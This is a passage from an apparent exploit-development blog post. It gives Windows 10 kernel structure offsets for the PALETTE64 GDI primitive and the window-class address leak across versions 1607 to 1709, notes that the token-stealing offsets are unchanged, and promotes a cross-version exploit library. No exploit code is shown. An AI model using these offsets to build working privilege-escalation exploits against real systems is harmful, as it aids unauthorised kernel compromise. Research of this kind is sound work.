ffff89c9c4611000 is not a valid large pool allocation, checking large session pool...
*ffff89c9c4611000 : large page allocation, tag is Gh08, size is 0x1010 bytes
  Pooltag Gh08 : GDITAG_HMGR_PAL_TYPE, Binary : win32k.sys

So this is the end of the PALETTE64 structure:

    PALETTEENTRY    *pFirstColor;  // 0x80
    struct _PALETTE *ppalThis;     // 0x88
    PALETTEENTRY    apalColors[3]; // 0x90

This doesn’t align with the output from WinDBG dump. So it turns out the new offsets are:

    PALETTEENTRY    *pFirstColor;  // 0x78
    struct _PALETTE *ppalThis;     // 0x80
    PALETTEENTRY    apalColors[3]; // 0x88

I didn’t check what is missing or what became smaller, but from Win10 v1607 this is the correct offset, including v1709.

Sweet, so now that is fixed, I got this working on v1607 and v1703, but it broke on v1709! It didn’t BSOD but I couldn’t leak the address anymore! What? Everyone said it works! Ok, let’s see the Window leak. The offsets changed there at version v1703, so there was a good chance they did again on v1709. Essentially:

Windows 10x64 v1607 and earlier (? - only tested back to v1511, not sure on Win8 or 7):
pcls = 0x98
lpszMenuNameOffset = 0x88

Windows10x64 v1703:
pcls = 0xa8
lpszMenuNameOffset = 0x90

Windows10x64 v1709:
pcls = 0xa8
lpszMenuNameOffset = 0x98

Once I fixed these as well, all started to work.

I checked and the structure offsets required for token stealing didn’t change, so essentially that was all.

Structure offsets change too often, and sometimes it’s not easy to track them down, essentially this is one of the reasons I’m trying to make 'kex' and hardcode all these offsets, so I can make OS independent exploits. With the current version you can essentially call these functions on version of Win10x64 and get it work reliably. Link: GitHub - theevilbit/kex

In order to make it easier for people contributing to offsets, and also make it easier for those, who want to code the same in different languages, I’m starting an offset table on the same GitHub repo. Directly: